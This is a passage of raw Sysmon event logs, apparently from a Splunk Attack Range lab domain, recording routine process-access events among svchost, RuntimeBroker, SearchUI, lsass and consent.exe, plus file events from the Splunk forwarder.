07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001048528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.069{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=BBAFBB5881A4D5943999BDA500745591,SHA256=2586CE4AC1315DD80188A5F0C92C8D447D1E6B11FBCACD584EDCEF4963DB170D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25F7B7EEB6BF6980EBAB441BBCE411D8,SHA256=8140E0D1B06C0BF6B4701A3F92761658DF9036C0C78F7D2849B5B5E3633B0686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:46.212{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E853D4BF1196A57186E8DB4BE5F5DCD,SHA256=8A6E31A0754F1711EACCABD0CE9AFB0470E00DE615034451911933D26AF2F793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E7301BC97D3D7C00A0B8293A848780,SHA256=816C70DF5D8EB4EF8F0D028879F3C58D9D84A2270A8697E54FDD1B3BB36F4392,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.103{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 